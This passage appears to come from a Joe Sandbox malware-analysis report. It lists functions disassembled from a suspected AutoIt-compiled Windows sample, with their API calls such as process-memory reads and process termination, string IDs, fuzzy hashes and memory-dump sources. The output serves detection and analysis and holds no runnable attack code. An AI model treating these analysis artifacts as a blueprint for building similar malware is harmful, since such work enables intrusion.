                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                    • Instruction ID: 468ba46b07f234de35b9d2f1ee046f518faffe33f45b6aa170da74217c236a4b
                                                                                                                    • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                    • Instruction Fuzzy Hash: C462FB70A24258DBEB24DFA4C850BDEB376EF58300F1091A9D10DEB2D1E775AE81CB59
                                                                                                                    Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: Error:
                                                                                                                    • API String ID: 4104443479-232661952
                                                                                                                    • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                    • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                    Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                    • String ID: X$pWH
                                                                                                                    • API String ID: 85490731-941433119
                                                                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                    Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • _memmove.LIBCMT ref: 00401B57
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                    • String ID: @EXITCODE
                                                                                                                    • API String ID: 2734553683-3436989551
                                                                                                                    • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                    • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                    Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                    • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                    Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1794320848-0
                                                                                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                    Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2429186680-0
                                                                                                                    • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                    • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                    Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                    • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                    • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                    • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                    Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0043214B
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • _malloc.LIBCMT ref: 0043215D
                                                                                                                    • _malloc.LIBCMT ref: 0043216F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 680241177-0
                                                                                                                    • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                    • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                    Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                    • _free.LIBCMT ref: 004295A0
                                                                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                    • API String ID: 3938964917-2806939583
                                                                                                                    • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                    • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                    Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strcat
                                                                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                    • API String ID: 1765576173-2684727018
                                                                                                                    • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                    • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                    Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                    • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                    • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                    • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                    Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4163294574-0
                                                                                                                    • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                    • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                    • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                    • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                    Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                    • _strcat.LIBCMT ref: 0040F786
                                                                                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
